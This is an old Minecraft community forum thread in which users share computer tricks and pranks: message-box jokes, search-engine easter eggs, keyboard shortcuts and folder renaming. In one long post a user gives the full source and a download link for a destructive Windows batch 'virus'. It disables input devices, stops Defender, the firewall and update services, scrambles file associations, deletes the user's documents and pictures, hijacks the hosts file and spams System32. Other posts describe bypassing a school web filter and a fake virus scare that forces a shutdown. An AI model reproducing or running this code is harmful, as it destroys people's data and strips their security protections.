1

Programming, scripting, and computer tricks

cooltop101's Avatar cooltop10111/26/12 4:22 pm
12/3/2012 10:45 pm
cooltop101's Avatar cooltop101
this is a place where you can discuss cool computer tricks
for example:
i found a code to say hello
@echo off
echo hello.
pause
//save as .bat

but please don't be that simple
when using a code type
[code][/code]
and here is a picture that has hidden files (1 text file saying congratz you are smart)
http://goo.gl/QtLzo
feel free to share the file
bluenode pm'ed me and said
why dont we just make a programming, scripting, and computer tricks thread in stead
so re-named it
Posted by cooltop101's Avatar
cooltop101
Level 22 : Expert Geek
8

Create an account or sign in to comment.

34

1
12/03/2012 10:26 pm
Level 38 : Artisan Nether Knight
thegameguy311
thegameguy311's Avatar
Search zerg rush on google for a fun time
1
12/03/2012 10:31 pm
Level 22 : Expert Geek
cooltop101
cooltop101's Avatar
i did that before but i have chrome and a plug-in that loads the 2,3,4... page while you were on the last...it was hard
1
12/03/2012 10:22 pm
Level 38 : Artisan Nether Knight
thegameguy311
thegameguy311's Avatar
You can make a cool message string come up using this in notepad and saving it as a .vbs file:

X=MsgBox("Would you like to scan for viruses?",3+48,"Possible Virus Detected")

X=MsgBox("Your coputer is now being killed by multiple viruses. Try to fix problems?",4+16,"Your computer has been infected!")

X=MsgBox("The problems could not be fixed. Shut down computer to minimalize damage?",3+16,"The problems could not be fixed")

X=MsgBox("You got pranked! Your computer is completely safe.",0+64,"You have been pranked!")
1
12/03/2012 10:13 pm
Level 22 : Expert Geek
cooltop101
cooltop101's Avatar
i have made a virus .bat but is a .exe
DO NOT RUN ON YOUR PC
thing it does
-gives a 5 second warning after that:
-disables keyboard/mouse so you cant close it
-disables:windows defender, Windows Security Center, Windows Firewall, Windows Backup, Windows Search, Windows Error Reporting, Windows Parental Controls, Windows Update
-changes .txt files to random things
-changes file extensions(what is used to open a program
thats not even the worst
-hides my music
-opens a box saying "spam"
-deletes: calc., ms paint, deletes my music, deletes internet explorer, windows live mail, my pics., and my docs.
-blocks: youtube, google, yahoo, hotmail, msn, wiki and facebook
-spams: desktop, c:/, system 32
-disables internet

code
\@echo off
echo VIRUS DETECTED...warning shut down before 5 seconds...or else!!!!
ECHO GOING IN EFFECT IN
SLEEP 1
echo 5
sleep 1
echo 4
sleep 1
echo 3
sleep 1
echo 2
sleep 1
echo 1
sleep 1
echo VIRUS STARTED...
sleep 1
echo disable mouse/keyboard




::------Disable Keyboard-----::
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start nokeyboard.reg
::---------------------------::
::-------Disable Mouse-------::
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
::---------------------------::

::--Disable Windows Defender-::
net stop "WinDefend"
taskkill /f /t /im "MSASCui.exe"
::---------------------------::
::-Disable Windows Security Center-::
net stop "wscsvc"
::---------------------------------::
::-Disable Windows Firewall--::
net stop "MpsSvc"
taskkill /f /t /im "FirewallControlPanel.exe"
::---------------------------::
::-Disable Windows Backup-::
net stop "SDRSVC"
::------------------------::
::--Disable Windows Search---::
net stop "WSearch"
::---------------------------::
::-Disable Windows Error Reporting-::
net stop "WerSvc"
::---------------------------------::
::-Disable Windows Parental Controls-::
net stop "WPCSvc"
::-----------------------------------::
::---Disable Windows Update--::
net stop "wuauserv"
::---------------------------::
:
::Confuse File Extensions [TXT]::
assoc .mp3=txtfile
assoc .xml=txtfile
assoc .png=txtfile
::-----------------------------::
::--Confuse File Extensions--::
assoc .dll=txtfile
assoc .exe=pngfile
assoc .bat=WinRAR
assoc .vbs=Visual Style
assoc .reg=xmlfile
assoc .txt=regfile
::---------------------------::
::----Hide My Music Folder---::
attrib +h "%userprofile%\my documents\my music"
::---------------------------::
::------MsgBox Function------::
echo x=msgbox("spam",vbCritical or vbOkOnly,"spam") >>dll32.vbs
start "" "dll32.vbs"
::---------------------------::
echo deleting programs...
pause 5

::--------Delete Calc.-------::
del /f /q "calc.exe"
::---------------------------::
::-------Delete Wordpad------::
del /f /q "WordPad.exe"
::---------------------------::
::-------Delete MS Paint-----::
del /f /q "mspaint.exe"
::---------------------------::
::-----Delete My Music-------::
del /f /q "C:\Users\%userprofile%\My Documents\My Music\*.*"
::---------------------------::
::--Delete Internet Explorer-::
del /f /q "C:\Program Files\Internet Explorer\iexplore.exe"
::---------------------------::
::--Delete Windows Live Mail-::
del /f /q "wlmail.exe"
::---------------------------::
::-----Delete My Pictures----::
del /f /q "C:\Users\%userprofile%\My Documents\My Pictures\*.*"
::---------------------------::
::----Delete My Documents----::
del /f /q "C:\Users\%userprofile%\My Documents\*.*"
::---------------------------::
echo blocking websites
pause 5

::-------Block YouTube-------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 youtube.com >> "Hosts"
echo 127.0.0.1 www.youtube.com >> "Hosts"
::---------------------------::
::--------Block Google-------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 google.com >> "Hosts"
echo 127.0.0.1 www.google.com >> "Hosts"
::---------------------------::
::--------Block Hotmail------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 hotmail.com >> "Hosts"
echo 127.0.0.1 www.hotmail.com >> "Hosts"
::---------------------------::
::---------Block MSN---------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 msn.com >> "Hosts"
echo 127.0.0.1 www.msn.com >> "Hosts"
::---------------------------::
::-------Block Wikipedia-----::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 wikipedia.org >> "Hosts"
echo 127.0.0.1 www.wikipedia.org >> "Hosts"
::---------------------------::
::--------Block Yahoo!-------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 yahoo.com >> "Hosts"
echo 127.0.0.1 www.yahoo.com >> "Hosts"
::---------------------------::
echo spam activated
pause 5

::-------Spam Desktop--------::
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
::---------------------------::
::-------Spam Desktop--------::
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
::---------------------------::
::-------Spam Desktop--------::
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
echo %random% > "%userprofile%\Desktop\%random%Spammed Filetype"
::---------------------------::
::----Spam System32 Folder---::
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
::---------------------------::
::----Spam System32 Folder---::
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
echo %random% > "C:\Windows\System32\%random%Spammed Filetype"
::---------------------------::
::-------Spam C Drive--------::
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
::---------------------------::
::-------Spam C Drive--------::
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
::---------------------------::
::------Custom Web Block-----::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 facebook.com >> "Hosts"
echo 127.0.0.1 www.facebook.com >> "Hosts"
::---------------------------::
::-----Disable Internet------::
ipconfig /release
if ERRORLEVEL1 ipconfig /release_all
::---------------------------::

download: http://goo.gl/EeZfD
1
12/03/2012 10:45 pm
Level 22 : Expert Geek
cooltop101
cooltop101's Avatar
also if you want a shutdown at the end type
shutdown -s -t Time Untill Shutdown -c "Comment"
1
11/27/2012 6:36 pm
Level 40 : Master Goblin
ItsBill
ItsBill's Avatar
Nobody appreciates the blinkenlights.
1
11/27/2012 9:00 pm
Level 22 : Expert Geek
cooltop101
cooltop101's Avatar
it's kinda cool
full episode of star wars in text!
1
11/27/2012 3:22 pm
Level 22 : Expert Geek
cooltop101
cooltop101's Avatar
renamed it because of buenode request (pm'ed me)
1
11/27/2012 12:03 am
Level 5 : Apprentice Crafter
CanIHazBlog
CanIHazBlog's Avatar
If you and a friend both have a mac and hamachi, you can SSH into your friend's computer through their hamachi IP. You have to know how to use SSH, and know their password and username. I'm not going to go into detail, because this can cause harm if meant to. You can also just play jokes by randomly opening websites or having the computer say things.

I am not responsible for any harm this may cause. Use Hamachi and give away your computer's password at your own risk.
1
11/26/2012 11:50 pm
Level 22 : Expert Crafter
Neptonic
Neptonic's Avatar
holding opt/alt on mac's while typeing cause special charaters to come up §£¥€™®©±∞¿¡¡↓÷¤µ¼½¾♪♭
see!
1
11/26/2012 11:54 pm
Level 22 : Expert Crafter
Neptonic
Neptonic's Avatar
did this come up right? on the preview it looks like rectangles.
1
11/26/2012 11:46 pm
Level 17 : Journeyman Warrior
ryguy22691298
ryguy22691298's Avatar
Search Do a barrel roll in Google
1
11/27/2012 9:10 pm
Level 53 : Grandmaster Programmer
Willsr71
Willsr71's Avatar
did it. lolz
1
11/26/2012 11:39 pm
Level 31 : Artisan Geek
eldin
eldin's Avatar
A pretty cool trick that everybody probably knows already is that if you right-click the desktop and click "Personalize," you'll be able to... uh... customize your desktop.
1
11/26/2012 11:35 pm
Level 3 : Apprentice Miner
vboeyy
vboeyy's Avatar
Nek minnit


1
11/26/2012 11:34 pm
Level 30 : Artisan Ninja
ChillaxTeam
ChillaxTeam's Avatar
Do FN + F7 on some laptops and it turns off the screen. =D. For an non educated person on computers, they will get very confused and think its in sleep and keep trying to wake it up xD.
1
11/26/2012 11:20 pm
Level 3 : Apprentice Miner
raisedpassion
raisedpassion's Avatar
MY favorite was on intel integrated graphics cards, press CTRL+ALT+UP / DOWN / LEFT / RIGHT to rotate the screen.

WHY IN THE WORLD INTEL would put this in is beyond me, but it's great fun to screw with ppl's heads.
1
11/26/2012 10:24 pm
Level 22 : Expert Geek
cooltop101
cooltop101's Avatar
how to get on blocked websites from school* i.e. planetminecraft.com
*i am NOT responsible for ANY trouble you get into
1 open notepad
2 type

@echo off
start cmd

3 once it opens (if blocked go to TIPS)if you want on planet minecraft type in cmd
ping planetminecrat.com
it will give you something like this
cmd
pinging planetminecraft.com [50.28.6.244] with 32 bytes of data:
reply from 50.28.6.244: bytes=32 time 333ms ttl=51
reply from 50.28.6.244: bytes=32 time 50ms ttl=51
reply from 50.28.6.244: bytes=32 time 52ms ttl=51
reply from 50.28.6.244: bytes=32 time 51ms ttl=51
ping stacs for 50.28.6.244:
packets:sent=4, received=4, lost=0 <0% lost>...and so on

type those numbers you got in the address bar (50.28.6.244 for pmc)
and it will load


TIPS
*if it is STILL blocked just type in notepad
@echo off
ping planetminecraft.com
pause

save that as planetminecraft.bat and run it
*these are semi-insecure so i am NOT responsible for password lost
*theses are called proxies so they are slower then normal
1
11/26/2012 9:53 pm
Level 22 : Expert Geek
cooltop101
cooltop101's Avatar
i also noticed 8 people clicked on the picture but has any one found the hidden file
1
11/27/2012 1:25 pm
Level 23 : Expert Network
Kytoko
Kytoko's Avatar
Open it up in WinRar or any other archive program :3
1
11/27/2012 3:25 pm
Level 22 : Expert Geek
cooltop101
cooltop101's Avatar
*claps
1
11/26/2012 9:48 pm
Level 43 : Master Herobrine
Doomslicer
Doomslicer's Avatar
instead of having to use control+click to select a bunch of items, click the item at the top of the list of what you want to select, and press shift+click at the bottom of the list. The cntrl+click all items u dont want to select. It's really helpful.
1
11/26/2012 9:39 pm
Level 40 : Master Goblin
ItsBill
ItsBill's Avatar
Pff, nobody I trust would fall for anything that uses more than 1 exclamation point.

Here's an old gem on Windows: First enable telnet on your computer by going to Control Panel › Programs › Turn Windows Feature On, checking the box(es) for telnet.

1. Go to Start, Search in Windows Vista and Windows 7. On Windows 8, open the main Start page.
2. Open command prompt (Run>cmd)
3. Type telnet and press Enter.
4. In the following command prompt window, type "o" press Enter.
5. Type "towel.blinkenlights.nl" and press Enter.
1
11/26/2012 8:43 pm
Level 22 : Expert Geek
cooltop101
cooltop101's Avatar
p.s. the second one says "WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!"(friend clicks ok)
says"SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."and will turn off your pc i 5 minutes
1
11/26/2012 8:41 pm
Level 22 : Expert Geek
cooltop101
cooltop101's Avatar
here is 2 fun facebook prank
1 open face book on your friends pc
go to the sign in page press F11
it will pull up this thing with a bunch of confusing things
just keep going through it till you see something like
"welcome to facebook!"or some thing like that
right click ->edit attribute
now type something else like
"GET BACK TO WORK!"or something like that and enjoy
2 open notepad type:
@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!

PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."

save as facebook.bat
right click->create shortcut
right click short cut->properties->find "change icon"in the "shortcut tab"
go to converticon.com upload a facebook picture from google
set that as icon(shortcut facebook properties)
watch yoou friend freak
for picture go to http://hackspc.com/computer-pranks-fake-facebook-virus/
1
11/26/2012 8:29 pm
Level 66 : High Grandmaster Hero
sed11
sed11's Avatar
Moved to correct section, also.
The "Discussion" forum is for Minecraft Discussion only.
1
11/26/2012 8:51 pm
Level 22 : Expert Geek
cooltop101
cooltop101's Avatar
i would've moved it my self but i didn't know there was a "gaming and technology"thread so...thank you
1
11/26/2012 8:24 pm
Level 11 : Journeyman Network
Zeerawk
Zeerawk's Avatar
sed11
xXN3PTUN3XxHere's a sorta simple thing I made a while ago,Be careful though xD It shuts down your pc

-snip-

Save it as a .bat for it to work

It is really awesome for a simple one

And I take all credit because I coded it


If your computer shuts down.....
Why use it?


It's a virus scanner prank,for those who know nothing about computers :p
if you do it all the right way it restarts.
1
11/26/2012 8:23 pm
Level 66 : High Grandmaster Hero
sed11
sed11's Avatar
xXN3PTUN3XxHere's a sorta simple thing I made a while ago,Be careful though xD It shuts down your pc

-snip-

Save it as a .bat for it to work

It is really awesome for a simple one

And I take all credit because I coded it


If your computer shuts down.....
Why use it?
1
11/26/2012 8:15 pm
Level 23 : Expert Network
Kytoko
Kytoko's Avatar
@echo off
color 02
:tricks
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto tricks


Open Notepad, paste in that code then save as [insertfilename].bat

Enjoy!
1
11/26/2012 8:29 pm
Level 22 : Expert Geek
cooltop101
cooltop101's Avatar
matrix
1
11/26/2012 8:31 pm
Level 11 : Journeyman Network
Zeerawk
Zeerawk's Avatar
do my matrix one it's almost the same just different name and stuffz
1
11/26/2012 8:13 pm
Level 8 : Apprentice Architect
player9793
player9793's Avatar
what does this do?
1
11/26/2012 8:11 pm
Level 22 : Expert Geek
cooltop101
cooltop101's Avatar
here are some ways to change the name of things
1 make new folder
2 name it whatever.(one code below)
recycle bun
{645FF040-5081-101B-9F08-00AA002F954E}
mycomputer
{20D04FE0-3AEA-1069-A2D8-08002B30309D}
network connections
{7007ACC7-3202-11D1-AAD2-00805FC1270E}
user accounts
{60632754-c523-4b62-b45c-4172da012619}
libraries
{031E4825-7B94-4dc3-B131-E946B44C8DD5}

i.e Trash.{645FF040-5081-101B-9F08-00AA002F954E}
would make a recycle bin named "Trashed"
Planet Minecraft

Website

© 2010 - 2024
www.planetminecraft.com

Welcome